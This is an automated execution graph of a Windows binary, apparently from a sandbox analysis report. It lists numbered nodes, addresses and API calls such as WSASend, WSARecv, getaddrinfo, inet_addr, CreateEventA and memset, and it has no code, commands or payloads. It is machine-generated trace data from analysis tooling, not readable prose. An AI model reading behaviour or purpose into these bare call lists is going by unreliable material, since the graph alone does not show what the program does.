                                                                                                                                                            execution_graph 12775 4d7a4d6 12776 4d7a4e5 12775->12776 12784 4d7a502 12775->12784 12777 4d7a570 abort 12776->12777 12778 4d7a507 12776->12778 12779 4d7a510 12776->12779 12780 4d7a4fb 12776->12780 12776->12784 12797 4d7cd86 12778->12797 12801 4d7cbd9 12779->12801 12785 4d7bb4c 12780->12785 12786 4d7bb64 12785->12786 12787 4d7bb88 12785->12787 12788 4d7bb77 12786->12788 12789 4d7bb6b shutdown 12786->12789 12791 4d7bc89 2 API calls 12787->12791 12793 4d7bb7d 12787->12793 12805 4d7bc89 12788->12805 12789->12793 12794 4d7bb9b 12791->12794 12792 4d7bc3b closesocket 12795 4d7bc48 12792->12795 12793->12792 12793->12795 12794->12793 12796 4d7bbc4 closesocket 12794->12796 12795->12784 12796->12794 12810 4d7beca 12797->12810 12799 4d7cd91 closesocket 12800 4d7cda2 12799->12800 12800->12784 12802 4d7cbed 12801->12802 12803 4d7cbe8 12801->12803 12802->12784 12812 4d7cbf7 12803->12812 12806 4d7bca1 12805->12806 12807 4d7bccf CancelIo 12806->12807 12808 4d7bcac WSAIoctl 12806->12808 12807->12793 12808->12807 12809 4d7bcca 12808->12809 12809->12793 12811 4d7bed4 12810->12811 12811->12799 12813 4d7cc0b 12812->12813 12814 4d7cc32 12813->12814 12816 4d7cc58 12813->12816 12814->12802 12821 4d7ccc4 12816->12821 12820 4d7cc99 12820->12814 12834 4d79c78 12821->12834 12824 4d7c391 12825 4d7c3b1 CreateEventA 12824->12825 12827 4d7c3a2 12824->12827 12826 4d7c41a 12825->12826 12825->12827 12826->12820 12828 4d7c3f6 WaitForSingleObject 12827->12828 12829 4d7c422 CloseHandle 12827->12829 12833 4d7c429 12827->12833 12831 4d7c404 GetLastError CloseHandle WSASetLastError 12828->12831 12832 4d7c41f 12828->12832 12829->12833 12830 4d7c445 WSASetLastError 12830->12826 12831->12826 12832->12829 12833->12830 12835 4d79c81 12834->12835 12836 4d79c8b 12834->12836 12838 4d79c8e CreateEventA InterlockedCompareExchange 12835->12838 12836->12824 12839 4d79cba SetEvent 12838->12839 12840 4d79cc9 CloseHandle WaitForSingleObject 12838->12840 12841 4d79cdb 12839->12841 12840->12841 12841->12836 14138 4d7355a 14139 4d73567 14138->14139 14141 4d73574 14138->14141 14140 4d741f6 4 API calls 14139->14140 14143 4d7356e 14140->14143 14142 4d735b7 14141->14142 14145 4d7210e 70 API calls 14141->14145 14143->14141 14144 4d735bc 14143->14144 14147 4d735c6 14144->14147 14145->14142 14148 4d735e4 14147->14148 14149 4d74a6e free 14148->14149 14150 4d73634 14148->14150 14149->14150 14151 4d7a4d6 19 API calls 14150->14151 14152 4d73653 14150->14152 14151->14152 14152->14142 12992 4d72372 12993 4d72383 12992->12993 12994 4d7239b 12992->12994 13014 4d7508a 12993->13014 12995 4d723c9 12994->12995 13000 4d723a5 12994->13000 12997 4d7234d free 12995->12997 13001 4d72396 12997->13001 13005 4d75514 malloc memset 13000->13005 13030 4d7ed4f memset 13005->13030 13007 4d75541 13031 4d7ed63 calloc 13007->13031 13009 4d75573 13010 4d723bd 13009->13010 13011 4d7559f __cfltcvt 13009->13011 13022 4d75694 13010->13022 13035 4d7f06e 13011->13035 13013 4d755c6 13013->13010 13015 4d75097 13014->13015 13016 4d7509e 13014->13016 13078 4d750a6 13015->13078 13086 4d7516b 13016->13086 13019 4d72389 13020 4d7234d free 13019->13020 13021 4d7236b 13020->13021 13021->13001 13148 4d7f1e7 13022->13148 13025 4d756ff 13155 4d75365 13025->13155 13026 4d756aa 13029 4d756b0 13026->13029 13152 4d7531f 13026->13152 13029->13001 13030->13007 13032 4d7ed91 13031->13032 13034 4d7eda6 13031->13034 13032->13034 13044 4d7ee1d 13032->13044 13034->13009 13036 4d7f093 13035->13036 13037 4d7f07b strlen 13035->13037 13039 4d7f0c2 13036->13039 13040 4d7f0a1 strlen 13036->13040 13037->13036 13038 4d7f08c __cfltcvt 13037->13038 13038->13013 13039->13038 13042 4d7f0ce calloc 13039->13042 13076 4d8237a 13040->13076 13042->13038 13045 4d7ee33 13044->13045 13046 4d7ee2d 13044->13046 13048 4d7ee41 13045->13048 13049 4d7f4cb free 13045->13049 13047 4d7f42f free 13046->13047 13047->13045 13050 4d7f46f 2 API calls 13048->13050 13051 4d7ee4d 13048->13051 13049->13048 13050->13051 13055 4d7eeb3 13051->13055 13058 4d7ecba memset 13051->13058 13053 4d7eea3 13059 4d7ef52 memset 13053->13059 13055->13034 13058->13053 13071 4d81e21 memset 13059->13071 13061 4d7ef6d 13072 4d81e21 memset 13061->13072 13063 4d7ef79 13073 4d8204f memset 13063->13073 13065 4d7ef82 13074 4d8204f memset 13065->13074 13067 4d7eeab 13068 4d7eee2 memset 13067->13068 13075 4d823c3 memset 13068->13075 13070 4d7ef01 13070->13055 13071->13061 13072->13063 13073->13065 13074->13067 13075->13070 13077 4d7f0b3 free 13076->13077 13077->13039 13079 4d750b3 13078->13079 13080 4d7511c 9 API calls 13079->13080 13082 4d750c1 13079->13082 13080->13082 13081 4d74a6e free 13083 4d750cf 13081->13083 13082->13081 13084 4d750e9 19 API calls 13083->13084 13085 4d750db 13084->13085 13085->13019 13087 4d7517e 13086->13087 13088 4d75179 13086->13088 13089 4d750a6 28 API calls 13087->13089 13088->13087 13095 4d7f3f1 13088->13095 13094 4d75188 13089->13094 13091 4d75195 13091->13087 13092 4d751a6 13091->13092 13099 4d751cd 13092->13099 13094->13019 13096 4d7f407 13095->13096 13097 4d7f3f9 13095->13097 13096->13091 13097->13096 13103 4d7e4a0 13097->13103 13100 4d751e5 13099->13100 13135 4d7a8b4 13100->13135 13102 4d7522c 13102->13094 13104 4d7e4e9 13103->13104 13105 4d7e4a8 13103->13105 13104->13096 13105->13104 13108 4d7dd69 13105->13108 13107 4d7e4e5 13107->13096 13109 4d7dda1 __cfltcvt 13108->13109 13111 4d7ddda 13109->13111 13112 4d7de46 13109->13112 13111->13107 13113 4d7de5c __cfltcvt 13112->13113 13115 4d7dfc0 13112->13115 13113->13115 13116 4d81f99 13113->13116 13115->13111 13117 4d81fd7 13116->13117 13118 4d81fa7 13116->13118 13117->13115 13121 4d88ed9 13118->13121 13126 4d88843 13121->13126 13123 4d81fd2 13123->13115 13124 4d88ef3 13124->13123 13131 4d88d64 13124->13131 13127 4d8885b 13126->13127 13130 4d888ca __cfltcvt 13126->13130 13128 4d8887c memset memset 13127->13128 13127->13130 13129 4d888e3 memset 13128->13129 13128->13130 13129->13130 13130->13124 13132 4d88d85 __cfltcvt _mbstowcs_s 13131->13132 13133 4d88de2 memset 13132->13133 13134 4d88e1d 13132->13134 13133->13134 13134->13123 13136 4d7a8d2 13135->13136 13137 4d7a8c3 13135->13137 13136->13137 13140 4d7b478 memset memset 13136->13140 13137->13102 13139 4d7a8f8 13139->13102 13141 4d7b4cf WSASend 13140->13141 13142 4d7b4b9 CreateEventA 13140->13142 13143 4d7b53b GetLastError 13141->13143 13145 4d7b4ec 13141->13145 13142->13141 13144 4d7b548 WSAGetLastError 13143->13144 13143->13145 13147 4d7b4f2 13144->13147 13146 4d7b5c3 RegisterWaitForSingleObject 13145->13146 13145->13147 13146->13147 13147->13139 13149 4d7f1f2 13148->13149 13150 4d756a2 13148->13150 13149->13150 13158 4d7f1c0 13149->13158 13150->13025 13150->13026 13153 4d751cd 7 API calls 13152->13153 13154 4d7533c 13153->13154 13154->13029 13156 4d75378 9 API calls 13155->13156 13157 4d75376 13156->13157 13157->13029 13159 4d7f1cd 13158->13159 13160 4d7f1e1 13158->13160 13159->13160 13163 4d84c16 13159->13163 13160->13149 13164 4d84c26 13163->13164 13193 4d7f1df 13163->13193 13165 4d84c5f 13164->13165 13166 4d84c7f 13164->13166 13167 4d84c9f 13164->13167 13168 4d84cbf 13164->13168 13169 4d84c77 13164->13169 13170 4d84c97 13164->13170 13171 4d84cb7 13164->13171 13172 4d84c6f 13164->13172 13173 4d84c8f 13164->13173 13174 4d84caf 13164->13174 13175 4d84ccf 13164->13175 13176 4d84c67 13164->13176 13177 4d84c87 13164->13177 13178 4d84ca7 13164->13178 13164->13193 13194 4d84d22 13165->13194 13257 4d85c16 13166->13257 13283 4d85f15 13167->13283 13304 4d7ebdd 13168->13304 13241 4d85979 13169->13241 13275 4d85d2e 13170->13275 13296 4d7e993 13171->13296 13231 4d7e62d 13172->13231 13271 4d7e4ef 13173->13271 13291 4d7eb43 13174->13291 13313 4d7ea9e 13175->13313 13204 4d85421 13176->13204 13266 4d85ce5 13177->13266 13288 4d7e967 13178->13288 13193->13149 13195 4d84d3a 13194->13195 13196 4d84d44 13194->13196 13195->13193 13196->13195 13320 4d853bd time 13196->13320 13199 4d84d8f __cfltcvt 13199->13195 13322 4d84f77 13199->13322 13200 4d84e9a 13325 4d852f3 13200->13325 13335 4d7e048 13204->13335 13206 4d85437 13207 4d85447 13206->13207 13212 4d8545e 13206->13212 13228 4d85451 13206->13228 13208 4d7e4a0 4 API calls 13207->13208 13208->13228 13209 4d7e4a0 4 API calls 13209->13228 13210 4d85764 13211 4d7e4a0 4 API calls 13210->13211 13211->13228 13212->13210 13215 4d854c7 __cfltcvt 13212->13215 13221 4d8550f 13212->13221 13213 4d85548 13214 4d7e4a0 4 API calls 13213->13214 13214->13228 13215->13213 13216 4d855cc time 13215->13216 13218 4d8559f memcmp 13215->13218 13215->13221 13217 4d855c1 __cfltcvt 13216->13217 13217->13213 13223 4d85644 13217->13223 13218->13216 13219 4d855b4 13218->13219 13342 4d7d60a 13219->13342 13221->13209 13221->13228 13223->13221 13223->13228 13358 4d8577b 13223->13358 13363 4d85856 13223->13363 13368 4d8581d 13223->13368 13373 4d858e9 13223->13373 13380 4d85892 13223->13380 13385 4d857ea 13223->13385 13390 4d857b0 13223->13390 13228->13193 13232 4d7e65b 13231->13232 13240 4d7e695 13231->13240 13233 4d7e048 5 API calls 13232->13233 13232->13240 13234 4d7e67e 13233->13234 13234->13240 13448 4d7e804 13234->13448 13238 4d7e6e9 13239 4d7e4a0 4 API calls 13238->13239 13238->13240 13239->13240 13240->13193 13242 4d85999 13241->13242 13248 4d859cb 13241->13248 13243 4d7e048 5 API calls 13242->13243 13244 4d859a0 13243->13244 13245 4d859b4 13244->13245 13246 4d859e5 13244->13246 13244->13248 13247 4d7e4a0 4 API calls 13245->13247 13245->13248 13246->13248 13622 4d85b4d 13246->13622 13247->13248 13248->13193 13250 4d7e4a0 4 API calls 13250->13248 13251 4d85a11 13251->13248 13252 4d85a18 13251->13252 13253 4d85aa7 13251->13253 13252->13250 13253->13248 13625 4d7f77e 13253->13625 13255 4d85ac6 __cfltcvt 13255->13248 13256 4d7e4a0 4 API calls 13255->13256 13256->13248 13258 4d85c28 13257->13258 13263 4d85c37 13257->13263 13259 4d7e048 5 API calls 13258->13259 13258->13263 13260 4d85c49 13259->13260 13261 4d85c55 13260->13261 13260->13263 13265 4d85c69 13260->13265 13262 4d7e4a0 4 API calls 13261->13262 13262->13263 13263->13193 13264 4d7e4a0 4 API calls 13264->13263 13265->13263 13265->13264 13267 4d7e048 5 API calls 13266->13267 13268 4d85cf2 13267->13268 13269 4d85cfe 13268->13269 13270 4d7e4a0 4 API calls 13268->13270 13269->13193 13270->13269 13272 4d7e509 __cfltcvt 13271->13272 13273 4d7e5ab 13271->13273 13272->13273 13274 4d7dcd4 4 API calls 13272->13274 13273->13193 13274->13273 13276 4d85d42 13275->13276 13279 4d85d51 13276->13279 13673 4d84b0e 13276->13673 13281 4d7dcd4 4 API calls 13279->13281 13282 4d85d69 13279->13282 13281->13282 13282->13193 13284 4d7d60a 8 API calls 13283->13284 13285 4d85f2f 13284->13285 13286 4d85f8e 13285->13286 13287 4d7dcd4 4 API calls 13285->13287 13286->13193 13287->13286 13289 4d7dcd4 4 API calls 13288->13289 13290 4d7e991 13289->13290 13290->13193 13293 4d7eb51 13291->13293 13292 4d7ebb6 memset 13294 4d7dcd4 4 API calls 13292->13294 13293->13292 13295 4d7ebd8 13294->13295 13295->13193 13297 4d7e048 5 API calls 13296->13297 13298 4d7e9a0 13297->13298 13299 4d7e9e1 13298->13299 13300 4d7e9c0 memset 13298->13300 13301 4d7e9ac 13298->13301 13299->13193 13300->13299 13302 4d7e4a0 4 API calls 13301->13302 13303 4d7e9b6 13302->13303 13303->13193 13305 4d7ec00 13304->13305 13306 4d7e048 5 API calls 13305->13306 13307 4d7ec08 13306->13307 13308 4d7ec15 13307->13308 13311 4d7ec29 13307->13311 13312 4d7ec1f 13307->13312 13309 4d7e4a0 4 API calls 13308->13309 13309->13312 13310 4d7e4a0 4 API calls 13310->13312 13311->13310 13311->13312 13312->13193 13314 4d7eab4 13313->13314 13319 4d7ead0 13313->13319 13315 4d7f4cb free 13314->13315 13317 4d7eac5 free 13315->13317 13317->13319 13746 4d7eb05 13319->13746 13321 4d853fa 13320->13321 13321->13199 13323 4d84f9b strlen 13322->13323 13324 4d84faa __cfltcvt 13322->13324 13323->13324 13324->13200 13326 4d84f36 13325->13326 13327 4d8531f 13325->13327 13331 4d7dcd4 13326->13331 13328 4d85325 strlen 13327->13328 13330 4d8533e __cfltcvt 13327->13330 13328->13327 13329 4d85368 strlen 13329->13330 13330->13326 13330->13329 13333 4d7dcf7 13331->13333 13332 4d7dcfc 13332->13195 13333->13332 13334 4d7dd69 4 API calls 13333->13334 13334->13332 13336 4d7e057 13335->13336 13341 4d7e09e 13335->13341 13395 4d7e0c6 13336->13395 13339 4d7e05d 13340 4d7e0c6 memmove 13339->13340 13339->13341 13399 4d7e123 13339->13399 13340->13339 13341->13206 13343 4d7d62c __cfltcvt 13342->13343 13346 4d7d694 __cfltcvt _mbstowcs_s 13343->13346 13357 4d7d646 _mbstowcs_s 13343->13357 13421 4d7d99c 13343->13421 13345 4d7d7e7 __cfltcvt 13350 4d7d926 13345->13350 13345->13357 13428 4d8217f 13345->13428 13346->13345 13346->13357 13424 4d820a8 13346->13424 13349 4d820a8 calloc 13349->13345 13432 4d81e58 13350->13432 13353 4d7d919 13355 4d8217f 2 API calls 13353->13355 13355->13350 13356 4d81e58 memset 13356->13357 13357->13217 13359 4d85784 13358->13359 13360 4d7e4a0 4 API calls 13359->13360 13361 4d8578d 13359->13361 13362 4d857a7 13360->13362 13361->13223 13362->13223 13364 4d85862 13363->13364 13365 4d7e4a0 4 API calls 13364->13365 13366 4d8586f 13364->13366 13367 4d85889 13365->13367 13366->13223 13367->13223 13369 4d85829 13368->13369 13370 4d7e4a0 4 API calls 13369->13370 13371 4d85836 13369->13371 13372 4d8584d 13370->13372 13371->13223 13372->13223 13374 4d858fb 13373->13374 13375 4d858ff 13373->13375 13376 4d7e4a0 4 API calls 13374->13376 13375->13374 13377 4d8592e strlen 13375->13377 13378 4d85951 13376->13378 13377->13375 13379 4d85939 memcmp 13377->13379 13378->13223 13379->13375 13379->13378 13383 4d8589b 13380->13383 13381 4d7e4a0 4 API calls 13384 4d858df 13381->13384 13382 4d858bc 13382->13223 13383->13381 13383->13382 13384->13223 13386 4d857f6 13385->13386 13387 4d7e4a0 4 API calls 13386->13387 13388 4d857fd 13386->13388 13389 4d85814 13387->13389 13388->13223 13389->13223 13391 4d857bf 13390->13391 13392 4d7e4a0 4 API calls 13391->13392 13393 4d857d4 13391->13393 13394 4d857e1 13392->13394 13393->13223 13394->13223 13396 4d7e0d5 13395->13396 13397 4d7e0da 13395->13397 13396->13397 13398 4d7e0e8 memmove 13396->13398 13397->13339 13398->13397 13400 4d7e130 13399->13400 13401 4d7e15d 13400->13401 13405 4d7e160 13400->13405 13401->13339 13403 4d7e13c 13403->13401 13409 4d7e21c 13403->13409 13406 4d7e198 13405->13406 13407 4d7e1bc 13406->13407 13408 4d7e4a0 4 API calls 13406->13408 13407->13403 13408->13407 13410 4d7e227 13409->13410 13411 4d7e22d 13409->13411 13413 4d7e246 13410->13413 13411->13401 13414 4d7e25d __cfltcvt 13413->13414 13416 4d7e3b1 13413->13416 13414->13416 13417 4d81fde 13414->13417 13416->13411 13418 4d81fec 13417->13418 13420 4d82015 13417->13420 13419 4d88f25 memset memset memset memset 13418->13419 13419->13420 13420->13416 13435 4d7d9c0 13421->13435 13423 4d7d9bb 13423->13346 13425 4d820b2 13424->13425 13426 4d7d7ce 13424->13426 13425->13426 13427 4d820cb calloc 13425->13427 13426->13349 13426->13357 13427->13426 13430 4d82191 13428->13430 13431 4d82223 _mbstowcs_s 13428->13431 13429 4d821fb memset memset 13429->13431 13430->13429 13430->13431 13431->13353 13433 4d81e69 memset 13432->13433 13434 4d7d939 13432->13434 13433->13434 13434->13356 13434->13357 13447 4d8204f memset 13435->13447 13437 4d7d9d5 __cfltcvt 13438 4d7d9f6 strlen 13437->13438 13446 4d7d9e6 _mbstowcs_s 13437->13446 13439 4d7da19 strlen 13438->13439 13438->13446 13440 4d7da34 __cfltcvt 13439->13440 13441 4d820a8 calloc 13440->13441 13442 4d7da5b 13441->13442 13443 4d8217f 2 API calls 13442->13443 13442->13446 13444 4d7da75 13443->13444 13445 4d82060 free 13444->13445 13445->13446 13446->13423 13447->13437 13449 4d7e813 13448->13449 13453 4d7e82a 13448->13453 13450 4d7e4a0 4 API calls 13449->13450 13464 4d7e68e 13450->13464 13451 4d7e950 13452 4d7e4a0 4 API calls 13451->13452 13452->13464 13453->13451 13454 4d7e87d calloc 13453->13454 13457 4d7e86f free 13453->13457 13455 4d7e8b3 13454->13455 13456 4d7e89c 13454->13456 13471 4d847b2 memset 13455->13471 13458 4d7e4a0 4 API calls 13456->13458 13457->13454 13458->13464 13461 4d7e92e 13463 4d7e4a0 4 API calls 13461->13463 13462 4d7e8b9 13462->13451 13462->13461 13462->13464 13472 4d8364e 13462->13472 13463->13464 13464->13240 13465 4d84016 13464->13465 13466 4d84031 13465->13466 13468 4d84059 13466->13468 13470 4d84039 13466->13470 13557 4d8463b strlen 13466->13557 13564 4d8418e 13468->13564 13470->13238 13471->13462 13473 4d83663 13472->13473 13476 4d836a7 13472->13476 13473->13476 13477 4d8368e calloc 13473->13477 13481 4d836b6 13473->13481 13475 4d836c9 13475->13476 13480 4d836e2 free 13475->13480 13476->13462 13477->13476 13478 4d836ae 13477->13478 13482 4d847b2 memset 13478->13482 13480->13476 13483 4d836fd memset memset memset 13481->13483 13482->13481 13484 4d8373a _mbstowcs_s 13483->13484 13496 4d83768 13483->13496 13485 4d83782 calloc 13484->13485 13484->13496 13486 4d837a8 __cfltcvt _mbstowcs_s 13485->13486 13485->13496 13486->13496 13497 4d8b613 13486->13497 13488 4d83881 _mbstowcs_s 13488->13496 13502 4d8b82a 13488->13502 13490 4d8397c 13491 4d839eb 13490->13491 13490->13496 13513 4d83bb0 13490->13513 13493 4d83a23 memcmp 13491->13493 13491->13496 13494 4d83a36 13493->13494 13493->13496 13495 4d83a42 memcmp 13494->13495 13494->13496 13495->13496 13496->13475 13498 4d8b61e 13497->13498 13499 4d8b625 13497->13499 13498->13488 13519 4d8c376 13499->13519 13503 4d8b849 _mbstowcs_s 13502->13503 13504 4d8b850 13503->13504 13522 4d8bea4 memset 13503->13522 13504->13490 13506 4d8b86e 13506->13504 13507 4d8b8d5 13506->13507 13509 4d8b8e6 13506->13509 13526 4d8bdcc 13507->13526 13509->13504 13534 4d8b948 13509->13534 13514 4d83bc3 13513->13514 13516 4d83bca _mbstowcs_s 13513->13516 13514->13491 13516->13514 13547 4d8c2be 13516->13547 13550 4d83ef6 13516->13550 13553 4d83f2c 13516->13553 13520 4d8c329 memcmp 13519->13520 13521 4d8b633 13520->13521 13521->13488 13523 4d8bec9 13522->13523 13524 4d8c39d memcmp 13523->13524 13525 4d8bed0 13523->13525 13524->13525 13525->13506 13527 4d8bde5 _mbstowcs_s 13526->13527 13528 4d8947f free calloc free memset 13527->13528 13533 4d8bdf7 13527->13533 13529 4d8be2a _mbstowcs_s 13528->13529 13530 4d8947f free calloc free memset 13529->13530 13529->13533 13531 4d8be66 13530->13531 13532 4d89540 7 API calls 13531->13532 13531->13533 13532->13533 13533->13504 13535 4d8b958 13534->13535 13536 4d8b96a 13534->13536 13537 4d8c408 memcmp 13535->13537 13538 4d8b997 6 API calls 13536->13538 13539 4d8b95d 13537->13539 13538->13539 13540 4d8b90c 13539->13540 13541 4d8c4aa free free 13539->13541 13540->13504 13542 4d8bd90 13540->13542 13541->13540 13543 4d863ec free calloc free memset 13542->13543 13544 4d8bdb2 13543->13544 13545 4d87fe1 __cfltcvt 5 API calls 13544->13545 13546 4d8bdc0 13544->13546 13545->13546 13546->13504 13548 4d8c2dc memcmp 13547->13548 13549 4d8c2c7 13548->13549 13549->13516 13551 4d8c175 calloc 13550->13551 13552 4d83f0b 13551->13552 13552->13516 13555 4d83f47 _mbstowcs_s 13553->13555 13554 4d83f4e 13554->13516 13555->13554 13556 4d83fb5 calloc 13555->13556 13556->13554 13556->13555 13558 4d8467b 13557->13558 13562 4d84657 13557->13562 13559 4d84688 memcmp 13558->13559 13561 4d84679 13558->13561 13563 4d846c7 strlen 13558->13563 13559->13558 13561->13468 13562->13561 13572 4d846c7 13562->13572 13563->13558 13571 4d841a8 13564->13571 13567 4d842c2 13567->13470 13571->13567 13579 4d8b6c9 13571->13579 13582 4d8b801 13571->13582 13585 4d845ed 13571->13585 13590 4d84409 13571->13590 13594 4d842f6 13571->13594 13574 4d846d5 13572->13574 13576 4d846e9 13574->13576 13577 4d846fd strlen 13574->13577 13575 4d846f5 13575->13562 13576->13562 13578 4d84716 13577->13578 13578->13575 13599 4d8b6f2 time 13579->13599 13581 4d8b6d8 13581->13571 13583 4d8b6f2 2 API calls 13582->13583 13584 4d8b810 13583->13584 13584->13571 13586 4d842f6 2 API calls 13585->13586 13587 4d84600 13586->13587 13588 4d84631 13587->13588 13589 4d84616 memcmp 13587->13589 13588->13571 13589->13587 13589->13588 13592 4d8441d 13590->13592 13593 4d84457 13592->13593 13604 4d84469 13592->13604 13593->13571 13597 4d84300 13594->13597 13595 4d8434c 13595->13571 13596 4d84316 memcmp 13596->13595 13596->13597 13597->13595 13597->13596 13618 4d8435a 13597->13618 13602 4d82396 gmtime 13599->13602 13601 4d8b712 13601->13581 13603 4d823a8 __cfltcvt 13602->13603 13603->13601 13605 4d84507 13604->13605 13609 4d84487 13604->13609 13605->13592 13608 4d8b6c9 2 API calls 13608->13609 13609->13605 13609->13608 13610 4d8b801 2 API calls 13609->13610 13611 4d845b3 13609->13611 13614 4d84528 13609->13614 13610->13609 13612 4d842f6 memcmp memcmp 13611->13612 13613 4d845c9 13612->13613 13613->13609 13616 4d8453f __cfltcvt 13614->13616 13615 4d84573 13615->13609 13616->13615 13617 4d834c4 15 API calls 13616->13617 13617->13615 13619 4d8436a 13618->13619 13621 4d84385 13618->13621 13620 4d84372 memcmp 13619->13620 13619->13621 13620->13621 13621->13597 13635 4d84aac 13622->13635 13624 4d85b66 13624->13251 13626 4d7f78e __cfltcvt 13625->13626 13672 4d8204f memset 13626->13672 13628 4d7f7a7 13629 4d820a8 calloc 13628->13629 13633 4d7f7b3 13629->13633 13630 4d82060 free 13631 4d7f81d 13630->13631 13632 4d7f82c 13631->13632 13634 4d7e4a0 4 API calls 13631->13634 13632->13255 13633->13630 13634->13632 13636 4d84ac3 13635->13636 13637 4d84ae7 13636->13637 13641 4d84a0f 13636->13641 13637->13624 13647 4d84a1f 13641->13647 13644 4d84aed 13656 4d86479 13644->13656 13646 4d84b0a 13646->13637 13650 4d8c4aa 13647->13650 13649 4d84a1c 13649->13637 13649->13644 13651 4d861e1 free free 13650->13651 13652 4d8c4b5 13651->13652 13653 4d8c4d2 13652->13653 13654 4d861e1 free free 13652->13654 13653->13649 13655 4d8c4ca 13654->13655 13655->13649 13657 4d86483 13656->13657 13658 4d864b4 13656->13658 13657->13658 13661 4d863ec 13657->13661 13658->13646 13662 4d863f7 13661->13662 13671 4d8640d 13661->13671 13663 4d863ff 13662->13663 13665 4d86410 __cfltcvt 13662->13665 13664 4d862d4 __cfltcvt calloc free memset 13663->13664 13663->13671 13664->13671 13666 4d7fbd8 _mbstowcs_s free calloc free memset 13665->13666 13665->13671 13667 4d8644a 13666->13667 13668 4d7fbd8 _mbstowcs_s free calloc free memset 13667->13668 13667->13671 13669 4d86460 13668->13669 13670 4d7fab6 _mbstowcs_s calloc free memset 13669->13670 13669->13671 13670->13671 13671->13646 13672->13628 13679 4d84b36 13673->13679 13676 4d84b83 13720 4d84ba4 13676->13720 13680 4d84b4b 13679->13680 13681 4d84b31 13679->13681 13685 4d848b4 13680->13685 13681->13282 13681->13676 13692 4d848d2 13685->13692 13688 4d864bb 13689 4d864cf 13688->13689 13691 4d864c8 13688->13691 13708 4d8631d 13689->13708 13691->13681 13697 4d88268 13692->13697 13695 4d848cd 13695->13681 13695->13688 13698 4d848e8 13697->13698 13699 4d88287 __cfltcvt _mbstowcs_s 13697->13699 13698->13695 13702 4d8654c 13698->13702 13699->13698 13700 4d81929 _mbstowcs_s free calloc free memset 13699->13700 13701 4d7fe33 _mbstowcs_s calloc free memset 13699->13701 13700->13699 13701->13699 13703 4d8655c __cfltcvt 13702->13703 13704 4d87fe1 __cfltcvt 5 API calls 13703->13704 13707 4d8659a 13703->13707 13705 4d8656b 13704->13705 13706 4d865a0 __cfltcvt 12 API calls 13705->13706 13705->13707 13706->13707 13707->13695 13709 4d86336 __cfltcvt 13708->13709 13710 4d8636a 13709->13710 13711 4d8633c 13709->13711 13714 4d863a7 __cfltcvt 13709->13714 13710->13711 13717 4d7fcb6 13710->13717 13711->13691 13714->13711 13716 4d7fcb6 __cfltcvt memset 13714->13716 13715 4d7fcb6 __cfltcvt memset 13715->13711 13716->13711 13718 4d7fccc memset 13717->13718 13719 4d7fce5 13717->13719 13718->13719 13719->13711 13719->13715 13721 4d84b9f 13720->13721 13722 4d84bb0 13720->13722 13721->13279 13722->13721 13726 4d8490e 13722->13726 13724 4d84bd4 __cfltcvt 13724->13721 13725 4d7fcb6 __cfltcvt memset 13724->13725 13725->13721 13729 4d8492f 13726->13729 13730 4d8493f __cfltcvt 13729->13730 13731 4d8654c __cfltcvt 12 API calls 13730->13731 13732 4d8495a __cfltcvt 13731->13732 13735 4d84971 13732->13735 13737 4d7f98a 13732->13737 13733 4d861bb __cfltcvt free 13734 4d8492a 13733->13734 13734->13724 13735->13733 13738 4d7f9a0 13737->13738 13741 4d7f9ad __cfltcvt 13737->13741 13739 4d7f9a7 13738->13739 13742 4d7f9b2 13738->13742 13740 4d7f848 _mbstowcs_s free 13739->13740 13740->13741 13741->13735 13743 4d7f9e7 memset 13742->13743 13744 4d7f9d5 13742->13744 13743->13741 13745 4d7f891 __cfltcvt calloc free 13744->13745 13745->13741 13747 4d7f46f 2 API calls 13746->13747 13748 4d7eb11 13747->13748 13749 4d7eafe 13748->13749 13750 4d7f42f free 13748->13750 13749->13193 13750->13749 14174 4d79c78 14175 4d79c81 14174->14175 14176 4d79c8b 14174->14176 14177 4d79c8e 5 API calls 14175->14177 14177->14176 12962 4d75365 12965 4d75378 12962->12965 12966 4d75382 12965->12966 12969 4d7a83a 12966->12969 12968 4d75376 12970 4d7a856 12969->12970 12971 4d7a846 12969->12971 12970->12971 12974 4d7afe4 12970->12974 12971->12968 12977 4d7b011 12974->12977 12975 4d7a87b 12975->12968 12976 4d7b047 12980 4d7b055 memset 12976->12980 12977->12975 12977->12976 12978 4d7b03a CreateEventA 12977->12978 12978->12976 12981 4d7b082 memset 12980->12981 12983 4d7b0c6 12981->12983 12984 4d7b0ce WSARecv 12981->12984 12983->12984 12985 4d7b110 GetLastError 12984->12985 12986 4d7b0f0 12984->12986 12985->12986 12987 4d7b11d WSAGetLastError 12985->12987 12990 4d7b16b RegisterWaitForSingleObject 12986->12990 12991 4d7b0fa 12986->12991 12988 4d7b127 WSAGetLastError 12987->12988 12989 4d7b12f WSAGetLastError 12987->12989 12988->12991 12989->12991 12990->12991 12991->12975 13950 4d734ef 13951 4d734fe 13950->13951 13953 4d73514 13951->13953 13956 4d742ec 13951->13956 13955 4d73554 13953->13955 13986 4d7210e 13953->13986 13957 4d74308 __cfltcvt 13956->13957 13958 4d74317 inet_addr 13957->13958 13959 4d74333 13958->13959 13960 4d7449b 13958->13960 13993 4d7a59e 13959->13993 13963 4d744b7 htons 13960->13963 13962 4d74347 13964 4d74351 13962->13964 13965 4d7438b strlen calloc 13962->13965 13967 4d74383 13963->13967 13969 4d7436a htons 13964->13969 13966 4d743b1 13965->13966 13985 4d74475 13965->13985 14000 4d720bf memset 13966->14000 13967->13953 13969->13967 13970 4d743ba 13971 4d743d0 memset strlen 13970->13971 13972 4d76453 3 API calls 13971->13972 13973 4d743f8 13972->13973 13974 4d7447a 13973->13974 14001 4d741f6 13973->14001 14014 4d720d9 13974->14014 13979 4d74a6e free 13980 4d7448c free 13979->13980 13980->13985 13983 4d7444b 13984 4d7210e 70 API calls 13983->13984 13984->13985 13985->13967 14029 4d72258 malloc 13986->14029 13988 4d72126 14031 4d76594 malloc 13988->14031 13990 4d7214a 14034 4d722bc malloc 13990->14034 13994 4d7a5c7 13993->13994 13995 4d7a5a8 13993->13995 14025 4d7a5d6 13994->14025 13996 4d7a5ad 13995->13996 14018 4d7a6a3 memset 13995->14018 13996->13962 13999 4d7a5c5 13999->13962 14000->13970 14002 4d7421a __cfltcvt 14001->14002 14003 4d74226 memset getaddrinfo 14002->14003 14004 4d742db 14003->14004 14007 4d74263 __cfltcvt 14003->14007 14004->13974 14009 4d71a2b 14004->14009 14005 4d742d2 FreeAddrInfoW 14005->14004 14006 4d7428c 14006->14005 14007->14005 14007->14006 14008 4d742bd htons 14007->14008 14008->14005 14013 4d71a41 __cfltcvt 14009->14013 14010 4d71ac7 14010->13974 14010->13983 14011 4d71a7f strchr 14012 4d71a9d 